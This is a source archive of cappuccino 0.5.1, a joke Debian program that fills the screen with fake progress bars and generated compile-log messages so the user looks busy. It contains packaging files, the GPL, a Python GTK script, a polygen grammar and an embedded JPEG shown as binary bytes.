cappuccino-0.5.1/0002755000175400037200000000000010521762663014045 5ustar cgabrieltruelitecappuccino-0.5.1/debian/0002755000175400037200000000000010521762663015267 5ustar cgabrieltruelitecappuccino-0.5.1/debian/changelog0000644000175400037200000000517010521762635017141 0ustar cgabrieltruelitecappuccino (0.5.1-1) unstable; urgency=low * "Halloween Release": new upstream release * moved to Python, with new dependencies * depends on polygen to generate random messages from an internal grammar -- Christian Surchi Wed, 1 Nov 2006 00:08:15 +0100 cappuccino (0.4-3) unstable; urgency=low * Ack for the NMU fixed bug (thanks to Lars Wirzenius) - missing dependency: please recompile (Closes: #306151) * debian/changelog: new references and complete copyright info * debian/control: bumped policy version to 3.7.2 -- Christian Surchi Mon, 24 Jul 2006 00:03:39 +0200 cappuccino (0.4-2.1) unstable; urgency=high * Non-maintainer upload. * Rebuilt since linc no longer in archive. Closes: #306151 (the bug is release critical, hence the urgency). * debian/menu: Quoted values that weren't quoted, since that's what the menu file syntax requires. -- Lars Wirzenius Thu, 28 Apr 2005 16:32:00 +0300 cappuccino (0.4-2) unstable; urgency=low * The "It's time for the upload" release * No DH_COMPAT in debian/rules, moved to debian/compat -- Christian Surchi Mon, 2 Jun 2003 15:40:36 +0200 cappuccino (0.4-1) unstable; urgency=low * New upstream release * Removed "emacsisms" in debian/changelog * Standard-Version from 3.5.5 to 3.5.8 * Build-depends: no libgnome-dev anymore, only libgtk2.0-dev and libgconf2-dev * New debian/rules with DH_COMPAT=4 now -- Christian Surchi Fri, 17 Jan 2003 02:47:09 +0100 cappuccino (0.3.2-1) unstable; urgency=low * New upstream release (Closes: #105715) -- Christian Surchi Fri, 3 Aug 2001 15:19:29 -0400 cappuccino (0.3.1-1) unstable; urgency=low * New upstream release (Closes: #99248, #99249) -- Christian Surchi Tue, 12 Jun 2001 10:01:40 -0400 cappuccino (0.3.0-1) unstable; urgency=low * New upstream release -- Christian Surchi Mon, 12 Feb 2001 18:34:09 +0100 cappuccino (0.2.0-2) unstable; urgency=low * Updated short description (Closes: #77771) -- Christian Surchi Wed, 20 Dec 2000 23:05:06 +0100 cappuccino (0.2.0-1) unstable; urgency=low * New upstream release (Closes: #77028) -- Christian Surchi Fri, 17 Nov 2000 18:17:23 +0100 cappuccino (0.1.5-1) unstable; urgency=low * New upstream release. -- Christian Surchi Thu, 2 Nov 2000 03:12:15 +0100 cappuccino (0.1.2-1) unstable; urgency=low * Initial Release. -- Christian Surchi Thu, 2 Nov 2000 03:10:24 +0100 cappuccino-0.5.1/debian/compat0000644000175400037200000000000210521762635016462 0ustar cgabrieltruelite4 cappuccino-0.5.1/debian/control0000644000175400037200000000112210521762635016663 0ustar cgabrieltrueliteSource: cappuccino Section: games Priority: optional Maintainer: Christian Surchi Standards-Version: 3.7.2 Build-Depends: debhelper (>> 4.0.0), python Package: cappuccino Architecture: all Depends: python, python-gtk2, polygen Description: an utility to let your boss think that you're working hard Run this software on your computer when you are not motivated to work, and enjoy doing something different. If your boss come in your cubicle, he'll think "Yeah, he's doing something different since his computer is really busy - He's doing something really important". cappuccino-0.5.1/debian/copyright0000644000175400037200000000060110521762635017214 0ustar cgabrieltrueliteThis package was debianized by Christian Surchi on Sun, 29 Oct 2000 21:07:26 +0100. Available from: https://www.cgabriel.org/software/wiki/Cappuccino Upstream Author: Christopher R. Gabriel Copyright: (c) 2000-2006 Christopher R. Gabriel Its license is GPLv2, which, on debian systems, is available at: /usr/share/common-licenses/GPL. cappuccino-0.5.1/debian/docs0000644000175400037200000000002410521762635016133 0ustar cgabrieltrueliteNEWS README AUTHORS cappuccino-0.5.1/debian/menu0000644000175400037200000000015210521762635016151 0ustar cgabrieltruelite?package(cappuccino):needs="X11" section="Games/Toys"\ title="cappuccino" command="/usr/bin/cappuccino" cappuccino-0.5.1/debian/rules0000755000175400037200000000305710521762635016351 0ustar cgabrieltruelite#!/usr/bin/make -f # Sample debian/rules that uses debhelper. # GNU copyright 1997 to 1999 by Joey Hess. # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 build: build-stamp build-stamp: dh_testdir # Add here commands to compile the package. #$(MAKE) #python setup.py build #/usr/bin/docbook-to-man debian/cappuccino.sgml > cappuccino.1 touch build-stamp clean: dh_testdir dh_testroot rm -f build-stamp # Add here commands to clean up after the build process. python setup.py clean #-$(MAKE) distclean dh_clean install: build dh_testdir dh_testroot dh_clean -k dh_installdirs # Add here commands to install the package into debian/cappuccino. #$(MAKE) install prefix=$(CURDIR)/debian/cappuccino/usr #$(MAKE) install DESTDIR=$(CURDIR)/debian/cappuccino python setup.py install --prefix=$(CURDIR)/debian/cappuccino/usr # Build architecture-independent files here. binary-indep: build install # We have nothing to do by default. # Build architecture-dependent files here. binary-arch: build install dh_testdir dh_testroot # dh_installdebconf dh_installdocs dh_installexamples dh_installmenu # dh_installlogrotate # dh_installemacsen # dh_installpam # dh_installmime # dh_installinit dh_installcron dh_installman cappuccino.1 dh_installinfo # dh_undocumented dh_installchangelogs ChangeLog dh_link dh_strip dh_compress dh_fixperms # dh_makeshlibs dh_installdeb # dh_perl dh_shlibdeps dh_gencontrol dh_md5sums dh_builddeb binary: binary-indep binary-arch .PHONY: build clean binary-indep binary-arch binary install cappuccino-0.5.1/AUTHORS0000644000175400037200000000056710521752337015120 0ustar cgabrieltrueliteChristopher R. Gabriel Contributors: Enrico Zini - Polygen grammar & ideas Cosimo Vagarini - interface enhancements - configuration functions - small bug fixes Debian packages by Christian Surchi cappuccino-0.5.1/COPYING0000644000175400037200000004311010521752337015072 0ustar cgabrieltruelite GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. cappuccino-0.5.1/ChangeLog0000644000175400037200000000406510521762637015623 0ustar cgabrieltruelite2006-11-01 Christopher R. Gabriel * cappuccino: removed gtk.glade dependencies * Version bump: 0.5.1 (bug fix release) 2006-10-31 Christopher R. Gabriel * cappuccino: complete rewrite with Python/Gtk. Bumped to 0.5.0. 2001-07-18 Christopher R. Gabriel * configure.in: bump to 0.3.2 * NEWS: Updated 2001-06-12 Christopher R. Gabriel * configure.in: version bump (0.3.1) 2001-06-11 Cosimo Vagarini * src/callbacks.c Debian Bug #99248: First sentence is skipped on first cycle- fixed. Debian Bug #99249: Optical glitch - fixed. When we reach the "final step", no configuration change can be made. You have to work, dude! :) 2001-01-11 Cosimo Vagarini * src/main.c update_progressbar() moved to callbacks.c * src/interface.c create_window() anchor changed in GTK_ANCHOR_CENTER before it couldn't center text in canvas create_window() added canvas_event create_window() doubled text in canvas create_config() new window to create your own cappuccino * src/callbacks.c new events for dialog button. config_get_values() Check values from dialog window. save_to_file() save new values to %HOME/.cappuccino * src/data.c load_data() Load default or user defined values 2000-12-22 Christopher R. Gabriel * src/interface.c (create_window): style management * src/main.c (update_progressbar): titolo -> title 2000-11-02 Christopher R. Gabriel * configure.in: fixed locales compilation bug. (AC_OUTPUT): build the man page from configure 2000-10-28 Christopher R. Gabriel * configure.in: bumped to release 0.1.2 2000-10-26 Christopher R. Gabriel * Initial import cappuccino-0.5.1/NEWS0000644000175400037200000000247210521762637014550 0ustar cgabrieltrueliteWhats' new in 0.5.1: * just a small bug fix release: depends no more on gtk.glade * including now debian package files What's new in 0.5 * complete rewrite using Python and Gtk bindings * bullshits are now dynamically generated using polygen. Enrico Zini provided us some interesting message files. * now with GNU Toolchain Power! * no more gconf What's new in 0.4 * complete rewrite * ported to GNOME 2.x platform * fullscreen!! * gconf usage instead of ~/.cappuccino * nicer, nicer! What's new in 0.3.2 * bug fix release (raised on from bugs.debian.org) What's new in 0.3.1 * bug fix release (raised on from bugs.debian.org) What's new in 0.2.3 (?) * Click three times on the windows (except the image) and you'll get the configuration window. Here you can set any sentence cappuccino will output and the number of cycles any sentence will be active. If you'll choose to remember the values, cappuccino will create the file $HOME/.cappuccino and there it will store your changes. Next time you'll run cappuccino you'll get _YOUR_ cappuccino. To restore default values, just delete $HOME/.cappuccino. What's new in 0.2.2 * Nicer background and random code obfuscation What's new in 0.1.2 * Added a man page cappuccino-0.5.1/README0000644000175400037200000000047610521752337014727 0ustar cgabrieltrueliteThis software suit all your worker's needs. Run this software on your computer when you are not motivated to work, and enjoy doing something different. If your boss come in your cubicle, he'll think "Yeah, he's doing hard workd since his computer is really busy - He's doing something really important". Enjoy, dude!cappuccino-0.5.1/cappuccino0000755000175400037200000000731510521762637016124 0ustar cgabrieltruelite#!/usr/bin/env python # -*- python -*- # # Copyright (C) 2000-2006 Christopher R. Gabriel # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License. import sys, gtk, os, gobject, os.path, glob, random # FIXME: change with something based on the setup script try: os.stat("cappuccino.grm") PLUGIN_DIR = "./" except OSError: PLUGIN_DIR = "/usr/share/cappuccino/" # to be discussed pipe_command = 'polygen %s' % os.path.join(PLUGIN_DIR, 'cappuccino.grm') class CappuccinoSplash(gtk.Window): def __init__(self): gtk.Window.__init__(self) image = gtk.Image() pixbuf = gtk.gdk.pixbuf_new_from_file(os.path.join(PLUGIN_DIR,'cappuccino.jpg')) image.set_from_pixbuf(pixbuf) self.add(image) class Cappuccino(gtk.Window): def __init__(self,title,speed=400): gtk.Window.__init__(self) # our data self.cur_position = 0.0 self.speed = speed self.waiting_message = "Work in progress" self.current_message = self.new_phrase() # set window stuff self.fullscreen() self.set_title = title #window's widgets self.w_vbox = gtk.VBox() self.w_label = gtk.Label() self.w_vbox.pack_start(self.w_label,True,True,40) self.w_scroll = gtk.ScrolledWindow() self.w_scroll.set_shadow_type(gtk.SHADOW_ETCHED_IN) self.w_scroll.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) self.w_vbox.pack_start(self.w_scroll, True, True,100) self.w_text = gtk.TextView() self.w_text.set_editable(False) self.w_scroll.add(self.w_text) self.w_align = gtk.Alignment(0.5,0.5,0.5,0.0) self.w_vbox.pack_start(self.w_align, True, True) self.progressbar = gtk.ProgressBar() # the bar is reset upon startup self.progressbar.set_fraction(0.0) self.w_align.add(self.progressbar) #self.w_vbox.pack_start(self.progressbar,True,True) self.get_log_data() self.add(self.w_vbox) # timeout that starts it all self.timeouter = gobject.timeout_add(self.speed, self.update) self.log_timeouter = gobject.timeout_add(1000, self.update_log) # event handling. Add some key press events handlers!! self.connect("delete_event", self.delete_handler) self.connect("destroy_event", self.delete_handler) def delete_handler(self,obj,param): # remove the timeout upon delete or destroy event! gobject.source_remove(self.timeouter) def get_log_data(self): p = os.popen("polygen -X 50 %s" % os.path.join(PLUGIN_DIR,"compileline.grm")) self.log = p.readlines() p.close() def update_log(self): # do the log! if len(self.log) < 1: self.get_log_data() buf = self.w_text.get_buffer() buf.insert_at_cursor(self.log.pop()) self.w_text.set_buffer(buf) ha = self.w_scroll.get_vadjustment() ha.set_value(ha.upper) self.w_scroll.set_vadjustment(ha) return True def update(self): self.cur_position += random.random() / 5.0 if self.cur_position > 1.2: self.cur_position = 0.0 self.current_message = self.new_phrase() self.w_label.set_markup('%s' % (self.current_message)) pos = (self.cur_position > 1 and 1 or self.cur_position) self.progressbar.set_fraction(pos) self.progressbar.set_text(str(int(100*pos))+" %") return True def new_phrase(self): p = os.popen(pipe_command,"r") phrase = p.read().strip() p.close() return phrase def startup(par): par.destroy() app = Cappuccino(sys.argv[0]) app.connect("delete_event", gtk.main_quit) app.connect("destroy_event", gtk.main_quit) app.show_all() if __name__ == "__main__": splash = CappuccinoSplash() splash.show_all() t = gobject.timeout_add(3000, startup, splash) gtk.main() cappuccino-0.5.1/cappuccino.10000644000175400037200000000171310521762637016254 0ustar cgabrieltruelite.TH CAPPUCCINO 1 "1 November 2006" Version 0.5.1 .SH NAME cappuccino - a small utility to let your boss think that you're working hard. .SH SYNOPSIS .B cappuccino .SH DESCRIPTION .PP \fIcappuccino\fP is a tool that you can use to let your boss think that you're working hard and harder, while you're doing several different stuff: taking a cappuccino, reading Mickey Mouse comics, listening to music, and so on. \fIWARNING\fP this software is just for humor use, I'M NOT INVITING YOU TO AVOID YOUR DUTIES. I'LL BE NO RESPONSIBLE FOR WORKERS WHO DOESN'T WANT TO WORK ANYMORE. . .SH COPYRIGHT Copyright \(co 2000-2006 Christopher R. Gabriel Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. cappuccino-0.5.1/cappuccino.grm0000644000175400037200000000402710521762637016702 0ustar cgabrieltruelite(* Copyright (C) 2000-2006 Enrico Zini This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License. *) I ::= "title: Messages for Cappuccino\n" ^ "author: Enrico Zini <enrico@debian.org>\n" ^ "language: english\n" ^ "status: useable\n" ^ "topic: Debian\n" ^ "created: 16/09/2006" ; S ::= \ Phrase ; Phrase ::= >Unary | >Binary | -----"Found a bug in" Object ^"! Reporting to" Adjective "BTS..." ; Unary ::= UnaryAction Object ; Binary ::= (>UnaryAction | >BinaryAction) Object (and|with) Object ; UnaryAction ::= -aggregating | arranging | -arranging | assembling | aligning | clearing | checking | --clustering | -collecting | -combining | compiling | composing | converting | compressing | --debugging | evaluating | gathering | grouping | growing | installing | inspecting | linking | mapping | matching | monitoring | --mining | optimizing | organizing | --pairing | processing | refining | repairing | sorting | storing | stripping | testing | transforming | trimming | verifying | --deleting | --formatting | --unoptimizing ; BinaryAction ::= comparing | joining ; Item ::= module | library | executable | agent | --bug | code ; Object ::= Adjective Item | Item "#"^Number ; Adjective ::= _ | accessory | addendum | additional | adjunct | ancillary | assisting | auxiliary | backing | binary | collateral | complementary | --contingent | --defective | --deputy | extra | helper | -inessential | instrumental | modal | main | new | -nonessential | --other | peripheral | secondary | --servant | slave | master | spare | subordinate | subsidiary | superfluous | supernumerary | supplementary | supporting | transitive | ulterior | unessential | nonexistant | unknown ; Digit ::= 0|1|2|3|4|5|6|7|8|9 ; Number ::= Digit (_| ++^Number) ; cappuccino-0.5.1/cappuccino.jpg0000644000175400037200000007767210521752337016711 0ustar cgabrieltrueliteJFIFHHExifII*   (1'2i SONYCYBERSHOTHHACD Systems Gestione immagini digitali2004:12:10 21:14:454<"'d0220DXl t|  |69480100  2002:07:05 21:04:242002:07:05 21:04:24 !a SONY DSC fPrintIM0100R980100ACD Systems Digital ImagingC  !"$"$C^" ]  !1AQ"aq2B#R37br $CEuv8Uc%&'4fFVes-!1AQ"a2qB# ?F?yv.$ύH驱ݨ0Z=[sQdTjAS:izhx5C,'i$\'DhRr@01H /Wz,A4PFi-kܷ x˚qI8d%XY2|RX P̎NXAcr.\\Y6<: T^:^\$@ sJ )%xrzh<QĦz,\ _Nu#+`c5 t$)b hU%Cf\cR 9*|6u?j]U`T] |]\8dnNsQ?Wj=Dx4Z>E &/0z]0~Q!ɩQ DH񓊁*ymNA/]*h$AtɤByryC)aRNC(YpJTP'SZA_Nyv8[;2@A8Mlc(iǂ緥 Xp23!ڌY4и5wI,Tzc̗S8!AJtkfagB564E.!v?'cp[Gr+l RgnH3ރl7$Į)sJf"l OWdsM++ lpIfURYr3I8F# ay%GiLJ"&$'<*#G#2Ku ꄑSs|q9Q\f9jfh(6_@zQ;U-j3hޙnqI>iԅz;΅V %q@ 93b`}ORNbR yLL+L=k)4Ddй٧R>cRyT~Intrh|hd0ڔ!5=Gۚ +,8{sKqC"cQ[1PDM KsFd!Đ;RuD6D^WM*8ʞ aɵ f9`Mo0*"Y:!I_ˑZQy Պ5MGߚi_JiN(Aw<^;p mV ;Kˡ9J?FٞxN_Ӭңνn?v?W__~"]O.eWp-3$dՕԽ|H7-ϫkgi^{ yJ?iԀ@5M'k$Fn}᤻OR쬮..ٕ&yROVY@4@a͑ޜ@.fTsUQ<6ռ2QZ75CsGRH##{ a؎ 3!UL|o ֑u]Su$BnT?pM*?߉B.k,GD(@(s;Ts] q-"Jc.5Uݟ^,mgBU1m:L}覷7-25R?9u$pj^޻=m'{;h̊]8#*7Ci3IR#*[?{}դ{z 3ʎez$hBúrx]:~n}uX[KEyc"Cq7AAr WG8|%xn6䠟Df󰀗sh+teAքOUKŭ3q^!-uX' @v溧xKD*|ӞpU~3Se>N[->*4* p ^V/v{[qZqhnIi:8Qz/-Cm䑞=?uEkvEIWQ|l -H?AiCL᎔?Z<'3vx.5Q-ђiQ˪#FzYOAwlRh 6, o+̽ʒ#Jۚ>OihW BOaG"xqZؿ ~Xwᵾ$QkW֢\DGP'-v}L0W=R&]HfFE7@h~PL{6H֕FLV4su YNֿfؚu:lLU//bi% "@A>AtM]iw3liun)RU88ԬkE0{7eḅrFA׿ufv5G4  shnvbu+;@,~go\?@k B 7O@J=q` |ȶs=РJ}:GU#Ŀ6><zn縰+c܀@5a?!jo&a]_дO-B#to %ںgeqq:6eI^z:ROVjhϼ!];s\hޟmsof׎ײ:!EtBDc=;gS[k)/Q\Sj>5So;wjW#Z2݅[SuW3:FDjqXAVr+7~oe<4{|DvX#^ =f?p\n)9e7{uiwNb#Vcb }~n :%ͭ*YO+vGpHxc\]C+S|}#N?`*,yU }[GYAiRޠ5{Y>GV.&bqG}0ijд[ kv!"E!"Xf IAs*LRNm(Ĉֿ5%z\fLehKF@3JwqjZ~ږ̐Z5 qZ1MDٯ( g`;W֛}뺆K -_gF*A]wT2Q?.E$#n٣Mt ePuU Hz< #= *rŠ11LD杒7NO" tMo0xȠ=F-YXLа<+j'cr)i!=|T`Nz6WeXAᜐOVu5ݐDond`3CFOА>I $@R,AZվ6_am4^e`*\#ؚZCe^ 6y1w~*2 ŮA/#HݮgoÜ)n>ݓB 6ffK^$ :z?Ѫf=oRѮF(%ҳN5*͞}vY6v>~rXS#kj V-6wXTdxOՓhWpaHoZU!Fsn߻Gں(-L2⡋8ĎGjo=ó7z -кY/ΥY݇K9r1Ǐ'qiL{Xky:Y\clV+)whZ&yy&dD M3QNL>fY&!)CKЧq¶߄_vk5p-]]NId2+ E=~]Y\hI,6e/ؚhS[cӷ0b?s?Mu6ݸݞ0n.-;>|lcՌw8beZG/>啳6?Eb'\uK}wau=g),t>"~/x@@1,<ni潝A%c/W-1vK.&.y&$t\sM #De˟ \ZλxouVR<˩V'%g7Ņ66qZ"NdHv T՛^?o;ikgXZA'S鑺 9pT4/+i7 dy6%@Ad Y3fw%=4iϗKm#mįc@kDt%/ZcJ\(T -2{O{n;+X$0AMqC`KP4-]+ZJK=# ̤ Mw$rݝgELat9\鹞?Hܺ#mSU&DGiYG,NS&Ӯe%*OIRrޕ8 ]OͲ"o˙dQ+tnMa~vڔD%XIܚ\vƋܿ0u>em7id1ٺ1$$:݌c41[lE{JF)sm2Mc)+/nc]QAs`3Fʰr+m#ɅN(֩vpZΙ}u*m3FH"^,~vIԼ뿃V={~˲<(`Nӣn_y9cs$|`?0 t$7jڎ=}u}u'VFM:]7njXpW\ñwbIHLZen+ŽL W(+܀8yqNQhuiq`( ðw66c=4^X Iҧ|3.5mNdėzCRE 9=/"imeAFgU6p>vo ѹ_ڶbwE>I8\cx&o\XF8UhNwf[tMexlu 